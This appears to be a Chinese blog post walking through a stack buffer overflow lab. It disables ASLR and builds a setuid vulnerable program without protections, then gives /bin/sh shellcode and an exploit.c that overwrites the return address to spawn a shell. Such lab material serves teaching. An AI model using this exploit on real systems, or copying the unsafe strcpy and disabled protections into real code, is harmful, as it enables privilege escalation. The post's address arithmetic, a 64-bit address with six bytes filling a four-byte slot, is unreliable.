<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="缓冲区溢出是指程序试图向缓冲区写入超出预期长度数据的情况，这一漏洞会被用来改变程序运行流程，可以执行任意代码片段。 为了方便观察汇编语句，需要在32位系统下操作，安装如下包： 12345$ sudo apt-get update$ sudo apt-get install -y lib32z1 libc6-dev-i386$ sudo apt-get install -y lib32readlin">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://yoursite.com/2019/08/26/缓冲区溢出漏洞利用实战分析/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="缓冲区溢出是指程序试图向缓冲区写入超出预期长度数据的情况，这一漏洞会被用来改变程序运行流程，可以执行任意代码片段。 为了方便观察汇编语句，需要在32位系统下操作，安装如下包： 12345$ sudo apt-get update$ sudo apt-get install -y lib32z1 libc6-dev-i386$ sudo apt-get install -y lib32readlin">
<meta property="og:locale" content="en">
<meta property="og:image" content="c:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556786535020.png">
<meta property="og:image" content="c:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556786760461.png">
<meta property="og:image" content="c:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556786832546.png">
<meta property="og:image" content="c:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556788199714.png">
<meta property="og:image" content="c:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556788846200.png">
<meta property="og:image" content="c:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556789758454.png">
<meta property="og:image" content="c:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556789920693.png">
<meta property="og:image" content="c:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556790422793.png">
<meta property="og:image" content="c:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556790601736.png">
<meta property="og:updated_time" content="2019-05-02T10:00:15.472Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Hexo">
<meta name="twitter:description" content="缓冲区溢出是指程序试图向缓冲区写入超出预期长度数据的情况，这一漏洞会被用来改变程序运行流程，可以执行任意代码片段。 为了方便观察汇编语句，需要在32位系统下操作，安装如下包： 12345$ sudo apt-get update$ sudo apt-get install -y lib32z1 libc6-dev-i386$ sudo apt-get install -y lib32readlin">
<meta name="twitter:image" content="c:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556786535020.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/08/26/缓冲区溢出漏洞利用实战分析/">





  <title> | Hexo</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/08/26/缓冲区溢出漏洞利用实战分析/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline"></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-08-26T23:35:51+08:00">
                2019-08-26
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>缓冲区溢出是指程序试图向缓冲区写入超出预期长度数据的情况，这一漏洞会被用来改变程序运行流程，可以执行任意代码片段。</p>
<p>为了方便观察汇编语句，需要在32位系统下操作，安装如下包：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ sudo apt-get update</span><br><span class="line"></span><br><span class="line">$ sudo apt-get install -y lib32z1 libc6-dev-i386</span><br><span class="line"></span><br><span class="line">$ sudo apt-get install -y lib32readline-gplv2-dev</span><br></pre></td></tr></table></figure>

<h3 id="1-初始设置"><a href="#1-初始设置" class="headerlink" title="1.初始设置"></a>1.初始设置</h3><p>linux使用地址随机化来随机堆栈内存地址，这使得猜测准确的内存地址非常困难，因此先关闭它：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ sudo sysctl -w kernel.randomize_va_space=0</span><br></pre></td></tr></table></figure>

<p><img src="C:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556786535020.png" alt="1556786535020"></p>
<p>为了防范缓冲区溢出攻击，许多shell在被调用时会放弃它的特权</p>
<p>在linux中/bin/sh实际指向的是/bin/bash</p>
<p>使用zsh代替/bin/sh：</p>
<p><img src="C:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556786760461.png" alt="1556786760461"></p>
<p>输入linux32进入32位的linux环境中：</p>
<p><img src="C:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556786832546.png" alt="1556786832546"></p>
<h3 id="2-shellcode"><a href="#2-shellcode" class="headerlink" title="2.shellcode"></a>2.shellcode</h3><p>如果不被利用，缓冲区溢出会造成程序崩溃，但如果覆盖返回地址的是另一个地址，程序就会跳到该地址上，如果这个地址指向的代码是一个shell，就会被利用。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span>* name[<span class="number">2</span>];</span><br><span class="line">    name[<span class="number">0</span>] = <span class="string">"/bin/sh"</span>;</span><br><span class="line">    name[<span class="number">1</span>] = <span class="literal">NULL</span>;</span><br><span class="line">    execve(name[<span class="number">0</span>],name,<span class="literal">NULL</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>使用调试器提取出来shellcode：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\x31\xc0\x50\x68&quot;//sh&quot;\x68&quot;/bin&quot;\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80</span><br></pre></td></tr></table></figure>

<h3 id="3-漏洞程序"><a href="#3-漏洞程序" class="headerlink" title="3.漏洞程序"></a>3.漏洞程序</h3><p>新建一个stack.c文件：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* stack.c */</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/* This program has a buffer overflow vulnerability. */</span></span><br><span class="line"><span class="comment">/* Our task is to exploit this vulnerability */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">bof</span><span class="params">(<span class="keyword">char</span> *str)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> buffer[<span class="number">12</span>];</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* The following statement has a buffer overflow problem */</span> </span><br><span class="line">    <span class="built_in">strcpy</span>(buffer, str);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> **argv)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> str[<span class="number">517</span>];</span><br><span class="line">    FILE *badfile;</span><br><span class="line"></span><br><span class="line">    badfile = fopen(<span class="string">"badfile"</span>, <span class="string">"r"</span>);</span><br><span class="line">    fread(str, <span class="keyword">sizeof</span>(<span class="keyword">char</span>), <span class="number">517</span>, badfile);</span><br><span class="line">    bof(str);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"Returned Properly\n"</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="C:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556788199714.png" alt="1556788199714"></p>
<p>程序会读取badfile文件，传到数组buffer中</p>
<p>然后编译程序：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ sudo su</span><br><span class="line"></span><br><span class="line">$ gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c</span><br><span class="line"></span><br><span class="line">$ chmod u+s stack</span><br><span class="line"></span><br><span class="line">$ exit</span><br></pre></td></tr></table></figure>

<p><img src="C:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556788846200.png" alt="1556788846200"></p>
<p>gcc编译器会阻止缓冲区溢出，-fno-stack-protector会关闭这种机制，-z execstack允许栈执行，-g可以用gdb调试</p>
<h3 id="4-漏洞利用"><a href="#4-漏洞利用" class="headerlink" title="4.漏洞利用"></a>4.漏洞利用</h3><p>exp代码如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* exploit.c */</span></span><br><span class="line"><span class="comment">/* A program that creates a file containing code for launching shell*/</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">char</span> shellcode[] =</span><br><span class="line">    <span class="string">"\x31\xc0"</span> <span class="comment">//xorl %eax,%eax</span></span><br><span class="line">    <span class="string">"\x50"</span>     <span class="comment">//pushl %eax</span></span><br><span class="line">    <span class="string">"\x68"</span><span class="string">"//sh"</span> <span class="comment">//pushl $0x68732f2f</span></span><br><span class="line">    <span class="string">"\x68"</span><span class="string">"/bin"</span>     <span class="comment">//pushl $0x6e69622f</span></span><br><span class="line">    <span class="string">"\x89\xe3"</span> <span class="comment">//movl %esp,%ebx</span></span><br><span class="line">    <span class="string">"\x50"</span>     <span class="comment">//pushl %eax</span></span><br><span class="line">    <span class="string">"\x53"</span>     <span class="comment">//pushl %ebx</span></span><br><span class="line">    <span class="string">"\x89\xe1"</span> <span class="comment">//movl %esp,%ecx</span></span><br><span class="line">    <span class="string">"\x99"</span>     <span class="comment">//cdq</span></span><br><span class="line">    <span class="string">"\xb0\x0b"</span> <span class="comment">//movb $0x0b,%al</span></span><br><span class="line">    <span class="string">"\xcd\x80"</span> <span class="comment">//int $0x80</span></span><br><span class="line">    ;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> **argv)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> buffer[<span class="number">517</span>];</span><br><span class="line">    FILE *badfile;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Initialize buffer with 0x90 (NOP instruction) */</span></span><br><span class="line">    <span class="built_in">memset</span>(&amp;buffer, <span class="number">0x90</span>, <span class="number">517</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* You need to fill the buffer with appropriate contents here */</span></span><br><span class="line">    <span class="built_in">strcpy</span>(buffer,<span class="string">"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??"</span>);   <span class="comment">//在buffer特定偏移处起始的四个字节覆盖sellcode地址  </span></span><br><span class="line">    <span class="built_in">strcpy</span>(buffer + <span class="number">100</span>, shellcode);   <span class="comment">//将shellcode拷贝至buffer，偏移量设为了 100</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Save the contents to the file "badfile" */</span></span><br><span class="line">    badfile = fopen(<span class="string">"./badfile"</span>, <span class="string">"w"</span>);</span><br><span class="line">    fwrite(buffer, <span class="number">517</span>, <span class="number">1</span>, badfile);</span><br><span class="line">    fclose(badfile);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>\x??\x??\x??\x??是shellcode保存在内存中的地址，溢出后这个位置可以覆盖返回地址</p>
<p>strcpy(buffer + 100, shellcode)可以知道shellcode的地址是buffer+100的地址</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"># gdb 调试</span><br><span class="line">$ gdb stack</span><br><span class="line">$ disass main</span><br></pre></td></tr></table></figure>

<p><img src="C:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556789758454.png" alt="1556789758454"></p>
<p><img src="C:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556789920693.png" alt="1556789920693"></p>
<p>根据strcpy(buffer + 100,shellcode)可以知道shellcode的地址是0x7fffffffde50+0x64（100的十六进制）=7FFFFFFFDEB4</p>
<p>将 \x??\x??\x??\x?? 修改为\xb4\xde\xff\xff\xff\x7f</p>
<p><img src="C:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556790422793.png" alt="1556790422793"></p>
<p>然后编译exp</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc  -o exploit exploit.c</span><br></pre></td></tr></table></figure>

<p>以此运行exp和stack漏洞程序就会拿到shell</p>
<p><img src="C:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1556790601736.png" alt="1556790601736"></p>
<h3 id="4-总结"><a href="#4-总结" class="headerlink" title="4.总结"></a>4.总结</h3><p>运行exp把shellcode写入到badfile文件中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">strcpy(buffer,&quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??&quot;);   //在buffer特定偏移处起始的四个字节覆盖sellcode地址</span><br></pre></td></tr></table></figure>

<p>已经计算好了buffer到返回地址的距离，\x??\x??\x??\x??就是返回地址</p>
<p>根据strcpy(buffer + 100,shellcode)可以知道shellcode的地址是0x7fffffffde50+0x64（100的十六进制）=7FFFFFFFDEB4</p>
<p>将 \x??\x??\x??\x?? 修改为\xb4\xde\xff\xff\xff\x7f</p>
<p>将shellcode的地址写到返回地址上，执行exp会写入到badfile文件中，stack漏洞程序打开badfile文件溢出后用shellcode地址覆盖bof函数的返回地址</p>
<p>程序直接去执行shellcode中的内容，然后最终得到了shell</p>
<p>这里的关键就是要计算出str距离返回地址的位置，根据buffer找到shellcode的位置</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/26/test-my-site/" rel="next" title="test_my_site">
                <i class="fa fa-chevron-left"></i> test_my_site
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">John Doe</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-初始设置"><span class="nav-number">1.</span> <span class="nav-text">1.初始设置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-shellcode"><span class="nav-number">2.</span> <span class="nav-text">2.shellcode</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-漏洞程序"><span class="nav-number">3.</span> <span class="nav-text">3.漏洞程序</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-漏洞利用"><span class="nav-number">4.</span> <span class="nav-text">4.漏洞利用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-总结"><span class="nav-number">5.</span> <span class="nav-text">4.总结</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
